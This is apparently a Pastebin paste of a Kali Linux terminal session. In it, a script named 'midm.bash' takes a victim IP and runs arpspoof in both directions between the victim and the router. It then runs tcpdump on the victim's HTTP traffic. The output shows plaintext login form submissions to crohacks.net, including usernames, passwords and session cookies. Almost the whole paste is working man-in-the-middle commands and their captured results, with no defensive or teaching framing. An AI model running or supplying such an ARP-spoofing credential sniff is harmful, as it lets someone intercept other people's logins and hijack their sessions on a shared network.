API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 30th, 2016
140
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.63 KB | None | 0 0
raw download clone embed print report
  1. 0 packets received by filter
  2. 0 packets dropped by kernel
  3. root@kali:~/Desktop/scripts# nano midm.bash
  4. root@kali:~/Desktop/scripts# ./midm.bash
  5. Enter victim IP followed by [ENTER]
  6. 192.168.1.13
  7. gnome-terminal -x sh -c "arpspoof -i wlan0 -t 192.168.1.13 192.168.1.1;/bin/bash"
  8. gnome-terminal -x sh -c "arpspoof -i wlan0 -t 192.168.1.1 192.168.1.13;/bin/bash"
  9. Do you wish to [r]ead or [w]rite tcpdump output?
  10. r
  11. tcpdump -s 0 -i wlan0 -A host 192.168.1.13 and tcp port http;/bin/bash
  12. tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
  13. listening on wlan0, link-type EN10MB (Ethernet), capture size 262144 bytes
  14. 01:21:31.250436 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [S], seq 2634145743, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
  15. E..4n^@...1.....h.1.b..P.......... .................
  16. 01:21:31.250463 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [S], seq 2634145743, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
  17. E..4n^@...2.....h.1.b..P.......... .................
  18. 01:21:31.261870 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 688909077, win 16425, length 0
  19. E..(n_@...1.....h.1.b..P....)...P.@)!w..
  20. 01:21:31.261894 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 1, win 16425, length 0
  21. E..(n_@...2.....h.1.b..P....)...P.@)!w..
  22. 01:21:31.265321 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [P.], seq 0:690, ack 1, win 16425, length 690: HTTP: POST /userlogin.php HTTP/1.1
  23. E...n`@.........h.1.b..P....)...P.@)| ..POST /userlogin.php HTTP/1.1
  24. Host: www.crohacks.net
  25. Connection: keep-alive
  26. Content-Length: 50
  27. Cache-Control: max-age=0
  28. Origin: http://www.crohacks.net
  29. Upgrade-Insecure-Requests: 1
  30. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
  31. Content-Type: application/x-www-form-urlencoded
  32. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  33. Referer: http://www.crohacks.net/userlogin.php
  34. Accept-Encoding: gzip, deflate
  35. Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
  36. Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149
  37.  
  38. username=asd123&password=testpassword&submit=Login
  39. 01:21:31.265337 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [P.], seq 0:690, ack 1, win 16425, length 690: HTTP: POST /userlogin.php HTTP/1.1
  40. E...n`@.../.....h.1.b..P....)...P.@)| ..POST /userlogin.php HTTP/1.1
  41. Host: www.crohacks.net
  42. Connection: keep-alive
  43. Content-Length: 50
  44. Cache-Control: max-age=0
  45. Origin: http://www.crohacks.net
  46. Upgrade-Insecure-Requests: 1
  47. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
  48. Content-Type: application/x-www-form-urlencoded
  49. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  50. Referer: http://www.crohacks.net/userlogin.php
  51. Accept-Encoding: gzip, deflate
  52. Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
  53. Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149
  54.  
  55. username=asd123&password=testpassword&submit=Login
  56. 01:21:31.413801 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 505, win 16299, length 0
  57. E..(na@...1.....h.1.b..P....)...P.?..K..
  58. 01:21:31.413833 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 505, win 16299, length 0
  59. E..(na@...2.....h.1.b..P....)...P.?..K..
  60. 01:21:31.416923 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [P.], seq 690:1275, ack 505, win 16299, length 585: HTTP: GET /userlogin.php HTTP/1.1
  61. E..qnb@.../C....h.1.b..P....)...P.?.E...GET /userlogin.php HTTP/1.1
  62. Host: www.crohacks.net
  63. Connection: keep-alive
  64. Cache-Control: max-age=0
  65. Upgrade-Insecure-Requests: 1
  66. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
  67. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  68. Referer: http://www.crohacks.net/userlogin.php
  69. Accept-Encoding: gzip, deflate, sdch
  70. Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
  71. Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
  72.  
  73.  
  74. 01:21:31.416944 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [P.], seq 690:1275, ack 505, win 16299, length 585: HTTP: GET /userlogin.php HTTP/1.1
  75. E..qnb@...0C....h.1.b..P....)...P.?.E...GET /userlogin.php HTTP/1.1
  76. Host: www.crohacks.net
  77. Connection: keep-alive
  78. Cache-Control: max-age=0
  79. Upgrade-Insecure-Requests: 1
  80. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
  81. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  82. Referer: http://www.crohacks.net/userlogin.php
  83. Accept-Encoding: gzip, deflate, sdch
  84. Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
  85. Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
  86.  
  87.  
  88. 01:21:31.488643 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 3258, win 16425, length 0
  89. E..(nc@...1.....h.1.b..P....)...P.@)....
  90. 01:21:31.488676 IP 192.168.1.13.25099 > 104.18.49.26.http: Flags [.], ack 3258, win 16425, length 0
  91. E..(nc@...2.....h.1.b..P....)...P.@)....
  92. 01:21:33.251912 IP 192.168.1.13.25018 > bud02s24-in-f16.1e100.net.http: Flags [.], seq 56568081:56568082, ack 3800290246, win 16445, length 1: HTTP
  93. E..)ng@..........:..a..P._).....P.@=.....
  94. 01:21:33.251932 IP 192.168.1.13.25018 > bud02s24-in-f16.1e100.net.http: Flags [.], seq 0:1, ack 1, win 16445, length 1: HTTP
  95. E..)ng@..........:..a..P._).....P.@=.....
  96. ^C
  97. 14 packets captured
  98. 14 packets received by filter
  99. 0 packets dropped by kernel
  100. root@kali:~/Desktop/scripts# ./midm.bash
  101. Enter victim IP followed by [ENTER]
  102. 192.168.1.13
  103. gnome-terminal -x sh -c "arpspoof -i wlan0 -t 192.168.1.13 192.168.1.1;/bin/bash"
  104. gnome-terminal -x sh -c "arpspoof -i wlan0 -t 192.168.1.1 192.168.1.13;/bin/bash"
  105. Do you wish to [r]ead or [w]rite tcpdump output?
  106. r
  107. tcpdump -s 0 -i wlan0 -A host 192.168.1.13 and tcp port http;/bin/bash
  108. tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
  109. listening on wlan0, link-type EN10MB (Ethernet), capture size 262144 bytes
  110. 01:23:05.544991 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [S], seq 1481341901, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
  111. E..4s.@...,D....h.1.b..PXK{....... .................
  112. 01:23:05.545050 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [S], seq 1481341901, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
  113. E..4s.@...-D....h.1.b..PXK{....... .................
  114. 01:23:05.557082 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 3840930751, win 16425, length 0
  115. E..(s.@...,O....h.1.b..PXK{.....P.@)....
  116. 01:23:05.557095 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 1, win 16425, length 0
  117. E..(s.@...-O....h.1.b..PXK{.....P.@)....
  118. 01:23:05.557110 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [P.], seq 0:725, ack 1, win 16425, length 725: HTTP: POST /userlogin.php HTTP/1.1
  119. E...s.@...)y....h.1.b..PXK{.....P.@)x...POST /userlogin.php HTTP/1.1
  120. Host: www.crohacks.net
  121. Connection: keep-alive
  122. Content-Length: 43
  123. Cache-Control: max-age=0
  124. Origin: http://www.crohacks.net
  125. Upgrade-Insecure-Requests: 1
  126. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
  127. Content-Type: application/x-www-form-urlencoded
  128. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  129. Referer: http://www.crohacks.net/userlogin.php
  130. Accept-Encoding: gzip, deflate
  131. Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
  132. Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
  133.  
  134. username=testing&password=heki&submit=Login
  135. 01:23:05.557120 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [P.], seq 0:725, ack 1, win 16425, length 725: HTTP: POST /userlogin.php HTTP/1.1
  136. E...s.@...*y....h.1.b..PXK{.....P.@)x...POST /userlogin.php HTTP/1.1
  137. Host: www.crohacks.net
  138. Connection: keep-alive
  139. Content-Length: 43
  140. Cache-Control: max-age=0
  141. Origin: http://www.crohacks.net
  142. Upgrade-Insecure-Requests: 1
  143. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
  144. Content-Type: application/x-www-form-urlencoded
  145. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  146. Referer: http://www.crohacks.net/userlogin.php
  147. Accept-Encoding: gzip, deflate
  148. Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
  149. Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
  150.  
  151. username=testing&password=heki&submit=Login
  152. 01:23:05.644022 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 404, win 16324, length 0
  153. E..(s.@...,M....h.1.b..PXK~....RP.?.....
  154. 01:23:05.644057 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 404, win 16324, length 0
  155. E..(s.@...-M....h.1.b..PXK~....RP.?.....
  156. 01:23:05.647147 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [P.], seq 725:1310, ack 404, win 16324, length 585: HTTP: GET /userlogin.php HTTP/1.1
  157. E..qs.@...*.....h.1.b..PXK~....RP.?.)c..GET /userlogin.php HTTP/1.1
  158. Host: www.crohacks.net
  159. Connection: keep-alive
  160. Cache-Control: max-age=0
  161. Upgrade-Insecure-Requests: 1
  162. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
  163. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  164. Referer: http://www.crohacks.net/userlogin.php
  165. Accept-Encoding: gzip, deflate, sdch
  166. Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
  167. Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
  168.  
  169.  
  170. 01:23:05.647165 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [P.], seq 725:1310, ack 404, win 16324, length 585: HTTP: GET /userlogin.php HTTP/1.1
  171. E..qs.@...+.....h.1.b..PXK~....RP.?.)c..GET /userlogin.php HTTP/1.1
  172. Host: www.crohacks.net
  173. Connection: keep-alive
  174. Cache-Control: max-age=0
  175. Upgrade-Insecure-Requests: 1
  176. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36
  177. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  178. Referer: http://www.crohacks.net/userlogin.php
  179. Accept-Encoding: gzip, deflate, sdch
  180. Accept-Language: hr-HR,hr;q=0.8,en-US;q=0.6,en;q=0.4
  181. Cookie: __cfduid=d7604547a6c4e0c77eb9b313bf562d92a1469373149; croHacksLogin=lg5gcdgabc48gvo8219b1lqc31
  182.  
  183.  
  184. 01:23:05.724867 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 3157, win 16425, length 0
  185. E..(s.@...,K....h.1.b..PXK......P.@).$..
  186. 01:23:05.724898 IP 192.168.1.13.25113 > 104.18.49.26.http: Flags [.], ack 3157, win 16425, length 0
  187. E..(s.@...-K....h.1.b..PXK......P.@).$..
  188. ^C
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!